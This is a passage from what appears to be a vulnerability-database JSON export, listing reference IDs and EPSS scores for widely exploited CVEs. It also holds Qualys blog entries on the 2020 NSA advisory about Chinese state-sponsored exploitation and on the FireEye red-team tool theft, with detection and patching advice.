"BEDCA78A-B03B-5065-AB50-3AC902332B03", "BEF7E47B-985F-56DE-AD21-DFEF507AAFE1", "C3AF7933-1DDE-58AB-BF32-75FEDB10C925", "C467EA51-59B6-5BEB-A634-62EFC2DC4419", "C4A313B8-6946-51D9-A5C4-EF515BAC47C9", "C50B5DBC-9051-5380-B5B3-93A023128F22", "C641C472-7F12-5C7B-9934-BE59C8B1974B", "C790841B-11B6-5497-B6DB-EF8A56DD8A0C", "C82E0A5A-3070-5ED4-A0CF-B3E342C5E0C1", "C89AC173-55D4-50C8-A17E-42EB65710CCB", "C9FCD26D-4C04-5F36-8E61-05484E6979D6", "CA1AFE75-C90A-5C21-92B0-FC1C0282B767", "CA34E4C9-BC58-5284-81F7-EC6AC06EC7AF", "CA7DF0EF-7032-54E3-B16E-D0845CE73845", "CD0102AD-F33A-5068-9719-30CB0CB3C152", "CF1C1A91-4D20-553C-A027-71BE18F8BAA5", "CF9EC818-A904-586C-9C19-3B4F04770FBD", "D07D56B4-40BB-511F-B7EA-EF5B1544D876", "D166D6FD-186D-5EE5-951A-8AB30D45EA32", "D2A01405-1B4C-5B8D-85AC-D1E23D1F3B56", "D4308421-E113-5104-8D37-4FB75AE2D7DC", "D4572C36-FAE8-5802-9B48-CF143220B909", "D4DF3FFF-4FBA-5ADB-88FC-A7E1BED572B9", "D6710F36-D7F3-57EA-BD83-CED78FC054F6", "D7EF2A21-5BA9-5730-90E0-E085DDFD2801", "D8B68D98-BBF3-5A69-82DD-C0760C9923D4", "D8BEFAC3-BA4E-5E7E-8553-B512E126AD53", "DB6F697E-55A0-538F-A15B-E61B8B4E4D70", "DC044D23-6D59-5326-AB78-94633F024A74", "DC8A29A1-755A-50C2-9D9D-FF11FCB054F2", "DF00B503-1F21-5ABD-B713-1F79E4D1CB9A", "E22A392B-5D30-51F4-92ED-8E10BA7EE8D2", "E2C6B714-1F75-5584-B0B3-280C3B36C014", "E3BF7E8E-58EA-5BC5-A6F4-401912FFB4BE", "E3D6A7AD-AC9C-55EB-A993-B78D05403B54", "E46AAFC9-276F-5161-B013-393D9A538259", "E5B0F794-87CD-5152-9D64-3AB23AF5C3EF", "E72D9129-EEED-5E3C-9CD8-9BD6201170C0", "E7B26D35-BAFD-51CB-BFAC-CA7E5EA5FA9A", "E8AD52BD-4EE5-5E85-91FE-66A868E0162B", "EA2EA382-C5B7-54EF-8547-EDDD15EA1B85", "EAFD9DBC-1E36-570B-9F48-8C355BBFD8E6", "EBBEA4C3-D6F9-53AF-BBE9-D3438C945AB4", "EBF17036-7547-54B5-B0D6-B465FE6C9873", "EE2763B9-CDEA-5FAF-91CF-8B6902DD2E56", "EE4C8DE4-3366-58B0-9494-7FD5B6F9D0EF", "F1CA855B-967C-5A5E-9256-FDDE87702713", "F2165DE4-7724-559C-A733-DE9F244DA408", "F22160B4-2E80-5B7D-8238-95D7833F6D73", "F27B127B-57F0-5352-B92F-B6F921378CBB", "F3D87CA2-44D8-583C-AF7F-85AA53FB6CAD", "F5B92B0D-E802-5254-8668-D6A4B1DB8004", "F775D2F3-FF1F-529F-B0F3-99AB6A801264", "F922DD70-E22B-5EBE-9CAE-410224E95831", "F9EF1801-C66C-572B-B67A-9A67E04D6B06", "FBA74A16-061A-5741-B662-B77D2C6DF28F", "FBB9B577-00A5-5C82-AFC5-4A52422056F3", "FE544217-2BB0-5C05-B26C-D14EE378E8A5", "FFBF7B7B-FFD8-5A32-89B0-AAB175FD2AE6", "FFF6224F-273A-5CB1-9421-833769E01519"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:2E85097DC4FBE492B1CB6FAE84AFE126"]}, {"type": "hackerone", "idList": ["H1:322935", "H1:518637", "H1:536130", "H1:541858", "H1:591295", "H1:632721"]}, {"type": "hivepro", "idList": ["HIVEPRO:FD730BCAD086DD8C995242D13B38EBC8"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20190529-01-WINDOWS"]}, {"type": "ibm", "idList": ["BBC19469EB9B90D82D15BF345DE6BD2F2984CAE6A5427AAEAFBF0699FD85D085"]}, {"type": "ics", "idList": ["ICSMA-20-049-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "IMPERVABLOG:6F67E97EF55C748CBFEE482E85D4751A", "IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51"]}, {"type": "kaspersky", "idList": ["KLA11460", "KLA11493", "KLA11639", "KLA11647", "KLA11664", "KLA11706", "KLA11720", "KLA11874", "KLA11875"]}, {"type": "kitploit", "idList": ["KITPLOIT:102871766956097088", "KITPLOIT:1049860926455958760", "KITPLOIT:1225614657733366094", "KITPLOIT:1494860154339275183", "KITPLOIT:1844185171331211854", "KITPLOIT:1986765330027575502", "KITPLOIT:3080370456145673111", "KITPLOIT:3124960652240981745", "KITPLOIT:3245813529202482542", "KITPLOIT:3359946123198241398", "KITPLOIT:3397940664053959113", "KITPLOIT:3565898196234868215", "KITPLOIT:4019975092566820832", "KITPLOIT:4205221140433081492", "KITPLOIT:43221571859278589", "KITPLOIT:4482238198881011483", "KITPLOIT:5485948766090500662", "KITPLOIT:5528727998547000766", "KITPLOIT:5769166566971079899", "KITPLOIT:5896951739767119270", "KITPLOIT:6073614302403805969", "KITPLOIT:6082359615438809301", "KITPLOIT:6972580572774284552", "KITPLOIT:724832466163115459", "KITPLOIT:727243444931520192", "KITPLOIT:777119556142010019", "KITPLOIT:7915799087007906859", "KITPLOIT:8309365460568193500", "KITPLOIT:8418780960315245103", "KITPLOIT:998955151150716619"]}, {"type": "krebs", "idList": ["KREBS:58D4F859AA2566B4BCE221DB78B85548", "KREBS:92A33A0E1BB183F4EF513731C0304581", "KREBS:C93CCA23099AC250E702848B49677D5B", "KREBS:F9486A3FDB624FD485CEA4ECAFAF3CCA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:31DFC46E307127AF5C9FD13F15DF62DB"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/PULSE_SECURE_FILE_DISCLOSURE", "MSF:AUXILIARY/SCANNER/HTTP/CITRIX_DIR_TRAVERSAL", "MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP", "MSF:EXPLOIT/LINUX/HTTP/CITRIX_DIR_TRAVERSAL_RCE", "MSF:EXPLOIT/MULTI/HTTP/CONFLUENCE_WIDGET_CONNECTOR", "MSF:EXPLOIT/MULTI/MISC/WEBLOGIC_DESERIALIZE_BADATTRVAL", "MSF:EXPLOIT/WINDOWS/RDP/CVE_2019_0708_BLUEKEEP_RCE"]}, {"type": "mmpc", "idList": ["MMPC:9AAC6D759E6AD62F92B56B228C39C263"]}, {"type": "mscve", "idList": ["MS:CVE-2019-0708", "MS:CVE-2019-0803", "MS:CVE-2019-1040", "MS:CVE-2020-0688", "MS:CVE-2021-26855", "MS:CVE-2021-26857", "MS:CVE-2021-26858", "MS:CVE-2021-27065"]}, {"type": "mskb", "idList": ["KB4534273"]}, {"type": "msrc", "idList": ["MSRC:181F9F2B53D93B5825CF48DFEB8D11C7", "MSRC:4D3D99779455BE99499289F3B3A35F84", "MSRC:6A6ED6A5B652378DCBA3113B064E973B", "MSRC:9FA59725E0E2287517314198EB45ED26"]}, {"type": "mssecure", "idList": ["MSSECURE:748E6D0B920B699D6D088D0AD4422C46", "MSSECURE:9A5D03B503C4E238EEFD4BF9E93C78A9", "MSSECURE:9AAC6D759E6AD62F92B56B228C39C263", "MSSECURE:E0AA6CC56D602890BBD5AF46A036FE67"]}, {"type": "myhack58", "idList": ["MYHACK58:62201889920", "MYHACK58:62201993579", "MYHACK58:62201994152", "MYHACK58:62201994153", "MYHACK58:62201994154", "MYHACK58:62201994162", "MYHACK58:62201994234", "MYHACK58:62201994259", "MYHACK58:62201994388", "MYHACK58:62201994853", "MYHACK58:62201995234", "MYHACK58:62201995523", "MYHACK58:62201995674", "MYHACK58:62201995881"]}, {"type": "nessus", "idList": ["ALA_ALAS-2018-970.NASL", "COLDFUSION_WIN_APSB18-14.NASL", "DEBIAN_DLA-1274.NASL", "DEBIAN_DSA-4110.NASL", "EXIM_4_90_1.NASL", "FEDORA_2018-25A7BA3CB6.NASL", "FEDORA_2018-5AEC14E125.NASL", "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL", "GENTOO_GLSA-201803-01.NASL", "OPENSUSE-2018-170.NASL", "SMB_NT_MS20_JAN_4528760.NASL", "SMB_NT_MS20_JAN_4534271.NASL", "SMB_NT_MS20_JAN_4534273.NASL", "SMB_NT_MS20_JAN_4534276.NASL", "SMB_NT_MS20_JAN_4534293.NASL", "SMB_NT_MS20_JAN_4534306.NASL", "UBUNTU_USN-3565-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108367", "OPENVAS:1361412562310108611", "OPENVAS:1361412562310108794", "OPENVAS:1361412562310140294", "OPENVAS:1361412562310704110", "OPENVAS:1361412562310814894", "OPENVAS:1361412562310815019", "OPENVAS:1361412562310815020", "OPENVAS:1361412562310815021", "OPENVAS:1361412562310815022", "OPENVAS:1361412562310815023", "OPENVAS:1361412562310815024", "OPENVAS:1361412562310815033", "OPENVAS:1361412562310815034", "OPENVAS:1361412562310815036", "OPENVAS:1361412562310815051", "OPENVAS:1361412562310815054", "OPENVAS:1361412562310815085", "OPENVAS:1361412562310815086", "OPENVAS:1361412562310815087", "OPENVAS:1361412562310815088", "OPENVAS:1361412562310815205", "OPENVAS:1361412562310815206", "OPENVAS:1361412562310815207", "OPENVAS:1361412562310815208", "OPENVAS:1361412562310815210", "OPENVAS:1361412562310815740", "OPENVAS:1361412562310815741", "OPENVAS:1361412562310815742", "OPENVAS:1361412562310815743", "OPENVAS:1361412562310815744", "OPENVAS:1361412562310815745", "OPENVAS:1361412562310815748", "OPENVAS:1361412562310815749", "OPENVAS:1361412562310815750", "OPENVAS:1361412562310843448", "OPENVAS:1361412562310851706", "OPENVAS:1361412562310874147", "OPENVAS:1361412562310874151", "OPENVAS:1361412562310891274"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2016"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:143821", "PACKETSTORM:152568", "PACKETSTORM:153133", "PACKETSTORM:153627", "PACKETSTORM:154176", "PACKETSTORM:154579", "PACKETSTORM:155904", "PACKETSTORM:155905", "PACKETSTORM:155930", "PACKETSTORM:155947", "PACKETSTORM:155972", "PACKETSTORM:157207", "PACKETSTORM:157795", "PACKETSTORM:158056", "PACKETSTORM:160047"]}, {"type": "ptsecurity", "idList": ["PT-2020-01"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:45B4EBB10CDE38B36A9C242F3D60C7A4", "QUALYSBLOG:563DC556FF331059CAC2F71B19B341B5", "QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54", "QUALYSBLOG:A28C30F71B1450A5D1A2C74AEBD22E6A", "QUALYSBLOG:FBDC4B445E6B33502BA1650A8BD4A6E1", "QUALYSBLOG:FD90A85F75806FE26BBC0970B56AFB9D"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:EAEC3BF3C403DB1C2765FD14F0E03A85"]}, {"type": "redhatcve", "idList": ["RH:CVE-2018-6789"]}, {"type": "saint", "idList": ["SAINT:4A51F090FB88D7C0687C235D80825104", "SAINT:50889C53D3A04E98F4F7E31365C75978", "SAINT:7C1EF5B76FC3A237B68C699EF952633A", "SAINT:880C926D2511DE57F08789A66AFE11F2", "SAINT:9870FA2AA27A04C7E50DC7E0A2A344D0"]}, {"type": "schneier", "idList": ["SCHNEIER:431597F9B05B18D767EC2998B8C5DD99"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:67C82A057DBE22C60DC2677D52D52ECD", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "seebug", "idList": ["SSV:96367"]}, {"type": "srcincite", "idList": ["SRC-2020-0011"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:0468-1"]}, {"type": "symantec", "idList": ["SMNTC-1411"]}, {"type": "talosblog", "idList": ["TALOSBLOG:2401133934B407D6B7E1C6D91E886EBA", "TALOSBLOG:25506C78BB084870681BE9F9E1357045", "TALOSBLOG:30A0CC27D6C35FC08DF198CA0AA9C626", "TALOSBLOG:340B43701E5CA96D8B4491CD801FE010", "TALOSBLOG:5757EE09BE22E4808719C348402D3F43", "TALOSBLOG:6A8FEAE9B7E20A5AA1A11907296891AF", "TALOSBLOG:71D138211697B43CB345A133B54BC824", "TALOSBLOG:97F975C073505AE88655FF1C539740A6", "TALOSBLOG:A2A267E7C20665C55127A15BC5B9F7BD", "TALOSBLOG:A56CDCC440F2E308EB75E66C6F9521B8", "TALOSBLOG:C41259322CA5338694B85978B0EA6FA5", "TALOSBLOG:C73CDA82B845335B5DCC8A94FB5662D8", "TALOSBLOG:D7662F18F14544FB63C58CB527CC3A4A", "TALOSBLOG:E1AA5BBE6ECD7FF1CDF68AD1858BAA5A", "TALOSBLOG:F5BDBD830CCBBD67980916B9F246B878"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:CF99A8E68CF7727296D8451EE445844C"]}, {"type": "thn", "idList": ["THN:166AAAF7F04EF01C9E049500387BD1FD", "THN:1BA2E3EE721856ECEE43B825656909B0", "THN:3D0ED27488E8AFC91D99882663F7E35A", "THN:46994B7A671ED65AD9975F25F514C6E3", "THN:4D730B0E8FB7A8FA81D69770EF31795C", "THN:65DE53134A31AE62D9634C0B4AA4E81B", "THN:6ED39786EE29904C7E93F7A0E35A39CB", "THN:80D2DBC4130D9FF314BDC4C19EB5CD4E", "THN:87AE96960D76D6C84D9CF86C2DDB837C", "THN:9B966D7333226606F54AD717A81F6D7E", "THN:F1F7A2FB2164F9A7A60AB12A3C71076A"]}, {"type": "threatpost", "idList": ["THREATPOST:040A4A9D0367AA2E807A97FB83D00240", "THREATPOST:050A36E6453D4472A2734DA342E95366", "THREATPOST:06C5D9E6950186757AA989F2557336B3", "THREATPOST:08D7AB11C0B2B0668D71ADCEEB94DB1B", "THREATPOST:0D8008A1EF72C3A6059283D0D896B819", "THREATPOST:142DAF150C2BF9EB70ECE95F46939532", "THREATPOST:170045B7C0BA198775BD78B7D00C824E", "THREATPOST:1925DCFAF239C5B25D21852DB978E8E9", "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "THREATPOST:20EAC8CBCC0B2A55B8195EB5B485B9D6", "THREATPOST:2243706D17F2A1E930A00F49D8E30720", "THREATPOST:22663CEB225A1F7F9DD4EBD8B84956C1", "THREATPOST:24AD38597408C4E7757770D45345AEBA", "THREATPOST:2BDC072802830F0CC831DE4C4F1FA580", "THREATPOST:32543D9C50E016B8E5F07112935E35F8", "THREATPOST:33026719684C7CD1B70B04B1CFFE2AEB", "THREATPOST:3E89058B621DF5B431A387D18E4F398C", "THREATPOST:420EE567E806D93092741D7BB375AC57", "THREATPOST:472451689B2FA39FCB837D08B514FF91", "THREATPOST:48D622E76FCC26F28B32364668BB1930", "THREATPOST:4C22D22EF8F65F5DA108A15C99CB9F55", "THREATPOST:4D733D952DD37D57DDA47C16AEAAE1FA", "THREATPOST:4DD624E32718A8990263A37199EEBD02", "THREATPOST:4F1C35A7D4BE774DF9C88794C793181D", "THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:54B8C2E27967886BC5CF55CA1E891C6C", "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "THREATPOST:63D2355B6EF0B975846E034876BC66DF", "THREATPOST:677D5A0A56D06021C8EF30D0361579C6", "THREATPOST:7BCCC5B4AA7FB7724466FFAB585EC55D", "THREATPOST:7E76268AD6AABF30EEE441619FF98ABF", "THREATPOST:85363E24CAB31CC66B298BC023E9CF95", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:985BD7D2744A9AA9EC43C5DDCD561812", "THREATPOST:99610F4016AECF953EEE643779490F30", "THREATPOST:A105AF0012294477B203EA2AFD1BCE82", "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "THREATPOST:B047BB0FECBD43E30365375959B09B04", "THREATPOST:B7F31FCDC8936516C077D39FEF9235AA", "THREATPOST:B956AABD7A9591A8F25851E15000B618", "THREATPOST:BD8DD789987BFB9BE93AA8FD73E98B40", "THREATPOST:BDEA819E4532E0D1FA016778F659F7E8", "THREATPOST:C535D98924152E648A3633199DAC0F1E", "THREATPOST:D15D3ADBA9A153B33E9ADCC9E9D6E07D", "THREATPOST:DDB6E2767CFC8FF972505D4C12E6AB6B", "THREATPOST:DDC9BA5F3C0866F008FA19229719AA13", "THREATPOST:DF7C78725F19B2637603E423E56656D4", "THREATPOST:EE9C0062A3E6400BAF159BCA26EABB34", "THREATPOST:FADCF664C06E3747C40C200AE681FDF8", "THREATPOST:FD8657F42A74CEDAA8D3F25A2362E6E8", "THREATPOST:FE41B3825C6A9EE91B00CDADD2AF9147"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:0EF9DC5097F65BD1DE3DF56D0170F328", "TRENDMICROBLOG:1D57AF69829D398639E3A4113B667998", "TRENDMICROBLOG:342FB0D457FCA0DA93C711A150B5CAE2", "TRENDMICROBLOG:9BC812C1F699A6136F37C0ACE6451F20", "TRENDMICROBLOG:9FD54B8253FD0053BA014F80A7261833", "TRENDMICROBLOG:A08558154279E1489712528387FEF700"]}, {"type": "ubuntu", "idList": ["USN-3565-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-6789"]}, {"type": "zdi", "idList": ["ZDI-20-128", "ZDI-20-258"]}, {"type": "zdt", "idList": ["1337DAY-ID-28326", "1337DAY-ID-32569", "1337DAY-ID-32826", "1337DAY-ID-33794", "1337DAY-ID-33806", "1337DAY-ID-33824", "1337DAY-ID-33828"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2015-4852", "epss": "0.963130000", "percentile": "0.991990000", "modified": "2023-03-15"}, {"cve": "CVE-2017-6327", "epss": "0.498520000", "percentile": "0.969030000", "modified": "2023-03-15"}, {"cve": "CVE-2018-4939", "epss": "0.973180000", "percentile": "0.997540000", "modified": "2023-03-16"}, {"cve": "CVE-2018-6789", "epss": "0.974750000", "percentile": "0.999330000", "modified": "2023-03-15"}, {"cve": "CVE-2019-0708", "epss": "0.975180000", "percentile": "0.999690000", "modified": "2023-03-15"}, {"cve": "CVE-2019-0803", "epss": "0.000500000", "percentile": "0.174800000", "modified": "2023-03-15"}, {"cve": "CVE-2019-1040", "epss": "0.448210000", "percentile": "0.967710000", "modified": "2023-03-15"}, {"cve": "CVE-2019-11510", "epss": "0.975040000", "percentile": "0.999580000", "modified": "2023-03-15"}, {"cve": "CVE-2019-11580", "epss": "0.974820000", "percentile": "0.999380000", "modified": "2023-03-16"}, {"cve": "CVE-2019-18935", "epss": "0.875440000", "percentile": "0.980240000", "modified": "2023-03-15"}, {"cve": "CVE-2019-19781", "epss": "0.975420000", "percentile": "0.999870000", "modified": "2023-03-15"}, {"cve": "CVE-2019-3396", "epss": "0.975030000", "percentile": "0.999560000", "modified": "2023-03-15"}, {"cve": "CVE-2020-0601", "epss": "0.973090000", "percentile": "0.997420000", "modified": "2023-03-16"}, {"cve": "CVE-2020-0688", "epss": "0.974590000", "percentile": "0.999100000", "modified": "2023-03-15"}, {"cve": "CVE-2020-10189", "epss": "0.971730000", "percentile": "0.996340000", "modified": "2023-03-16"}, {"cve": "CVE-2020-2555", "epss": "0.957330000", "percentile": "0.990080000", "modified": "2023-03-15"}, {"cve": "CVE-2020-3118", "epss": "0.002190000", "percentile": "0.581040000", "modified": "2023-03-16"}, {"cve": "CVE-2020-5902", "epss": "0.975670000", "percentile": "0.999950000", "modified": "2023-03-16"}, {"cve": "CVE-2020-8193", "epss": "0.974430000", "percentile": "0.998900000", "modified": "2023-03-16"}, {"cve": "CVE-2020-8195", "epss": "0.958460000", "percentile": "0.990450000", "modified": "2023-03-16"}, {"cve": "CVE-2020-8196", "epss": "0.002140000", "percentile": "0.576700000", "modified": "2023-03-16"}, {"cve": "CVE-2020-8515", "epss": "0.972460000", "percentile": "0.996840000", "modified": "2023-03-15"}], "vulnersScore": -0.3}, "_state": {"dependencies": 1678920471, "score": 1698841279, "epss": 1679045529}, "_internal": {"score_hash": "dd64e6ab57d1d6ed1a76bb47b557e693"}}

{"qualysblog": [{"lastseen": "2020-10-23T16:02:16", "description": "On October 20, 2020, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations.\n\n"Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and \nmitigation efforts," said the NSA advisory. It also recommended "critical system owners consider these actions a priority, in order to mitigate the loss of sensitive information that could impact U.S. policies, strategies, plans, and competitive advantage."\n\nEarlier this year, the NSA also announced Sandworm actors exploiting the [Exim MTA Vulnerability](<https://blog.qualys.com/product-tech/2020/05/29/nsa-announces-sandworm-actors-exploiting-exim-mta-vulnerability-cve-2019-10149>). Similar alerts have been published by the Cybersecurity and Infrastructure Security Agency (CISA) over the last year. CISA also issued an [advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>) notifying about vulnerabilities that were exploited in the wild to retrieve sensitive data such as intellectual property, economic, political, and military information. \n\nHere is a list of 25 publicly known vulnerabilities (CVEs) published by the NSA, along affected products and associated Qualys VMDR QID(s) for each vulnerability:\n\n**CVE-ID(s)**| **Affected products**| **Qualys QID(s)** \n---|---|--- \nCVE-2020-5902| Big-IP devices| 38791, 373106 \nCVE-2019-19781| Citrix Application Delivery Controller \nCitrix Gateway \nCitrix SDWAN WANOP| 150273, 372305, 372685 \nCVE-2019-11510| Pulse Connect Secure| 38771 \nCVE-2020-8193 \nCVE-2020-8195 \nCVE-2020-8196| Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 \nCitrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7| 13833, 373116 \nCVE-2019-0708| Microsoft Windows multiple products| 91541, 91534 \nCVE-2020-15505| MobileIron Core & Connector| 13998 \nCVE-2020-1350| Microsoft Windows multiple products| 91662 \nCVE-2020-1472| Microsoft Windows multiple products| 91688 \nCVE-2019-1040| Microsoft Windows multiple products| 91653 \nCVE-2018-6789| Exim before 4.90.1| 50089 \nCVE-2020-0688| Multiple Microsoft Exchange Server| 50098 \nCVE-2018-4939| Adobe ColdFusion| 370874 \nCVE-2015-4852| Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0| 86362, 86340 \nCVE-2020-2555| Oracle Coherence product of Oracle Fusion Middleware Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.| 372345 \nCVE-2019-3396| Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3), and from version 6.14.0 before 6.14.2| 13459 \nCVE-2019-11580| Atlassian Crowd and Crowd Data Center| 13525 \nCVE-2020-10189| Zoho ManageEngine Desktop Central before 10.0.474| 372442 \nCVE-2019-18935| Progress Telerik UI for ASP.NET AJAX through 2019.3.1023| 372327, 150299 \nCVE-2020-0601| Microsoft Windows multiple products| 91595 \nCVE-2019-0803| Microsoft Windows multiple products| 91522 \nCVE-2017-6327| Symantec Messaging Gateway before 10.6.3-267| 11856 \nCVE-2020-3118| Cisco IOS XR, NCS| 316792 \nCVE-2020-8515| DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices| 13730 \n \n## Detect 25 Publicly Known Vulnerabilities using VMDR\n\nQualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. You can search for these QIDs in VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds: [CVE-2019-11510,CVE-2020-5902,CVE-2019-19781,CVE-2020-8193,CVE-2020-8195,CVE-2020-8196,CVE-2019-0708,CVE-2020-15505,CVE-2020-1472,CVE-2019-1040,CVE-2020-1350,CVE-2018-6789,CVE-2018-4939,CVE-2020-0688,CVE-2015-4852,CVE-2020-2555,CVE-2019-3396,CVE-2019-11580,CVE-2020-10189,CVE-2019-18935,CVE-2020-0601,CVE-2019-0803,CVE-2017-6327,CVE-2020-3118,CVE-2020-8515]_\n\n * ![](https://blog.qualys.com/wp-content/uploads/2020/10/Screen-Shot-2020-10-22-at-10.32.04-AM-1-1070x479.png)\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize this vulnerability for "Active Attack" RTI:\n\n![](https://blog.qualys.com/wp-content/uploads/2020/10/Screen-Shot-2020-10-22-at-10.43.47-AM-1-1070x535.png)\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable host through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking this vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2020/10/Screen-Shot-2020-10-22-at-1.41.35-PM-1070x828.png)\n\nWith VMDR Dashboard, you can track 25 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the ["NSA's Top 25 Vulnerabilities from China" dashboard](<https://qualys-secure.force.com/customer/s/article/000006429>).\n\n![](https://blog.qualys.com/wp-content/uploads/2020/10/2020-10-22_12-45-21-1070x2407.png)\n\n### **Recommendations**\n\nAs guided by CISA, to protect assets from exploiting, one must do the following:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Vigilance team of an organization should keep a close eye on indications of compromise (IOCs) as well as strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n\n#### **Remediation and Mitigation**\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching the high-priority commonly exploited vulnerabilities.\n\n### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>\n\n<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2020/10/20/nsa-releases-advisory-chinese-state-sponsored-actors-exploiting>", "cvss3": {}, "published": "2020-10-22T23:10:29", "type": "qualysblog", "title": "NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-10149", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-22T23:10:29", "id": "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T00:22:53", "description": "**Update Jan 5, 2021**: New patching section with two new dashboard widgets showing the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.\n\n**Update Dec 23, 2020**: Added a new section on compensating controls.\n\n**Update Dec 22, 2020: **FireEye disclosed the theft of their Red Team assessment tools. Hackers now have an influential collection of new techniques to draw upon.\n\nUsing Qualys VMDR, the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following Real-Time Threat Indicators (RTIs):\n\n * Active Attacks\n * Solorigate Sunburst (**New RTI**)\n![](https://blog.qualys.com/wp-content/uploads/2020/12/Solori3-1-1070x417.png)\n\n**Original post**: On December 8, 2020, [FireEye disclosed](<https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html>) theft of their Red Team assessment tools. These tools are used by FireEye to test and validate the security posture of their customers. According to FireEye, the hackers now have an influential collection of new techniques to draw upon. It is unclear today if the attackers intend to use the tools themselves or if they intend to release the tools publicly in some way. \n\n\u201cThe attackers tailored their world-class capabilities specifically to target and attack FireEye. They are highly trained in operational security and executed with discipline and focus. They operated clandestinely, using methods that counter security tools and forensic examination,\u201d said Kevin Mandia, CEO of FireEye. However, the stolen tools did not contain zero-day exploits. \n\nIn response to the breach, FireEye has provided Red Team tool countermeasures which are [available on GitHub](<https://github.com/fireeye/red_team_tool_countermeasures>). These countermeasures include rules in multiple languages such as Snort, Yara, ClamAV and HXIOC. Since none of the leaked tools leverage zero-day attacks, FireEye also provided a [listing of CVEs](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>) used by these tools. \n\nAn 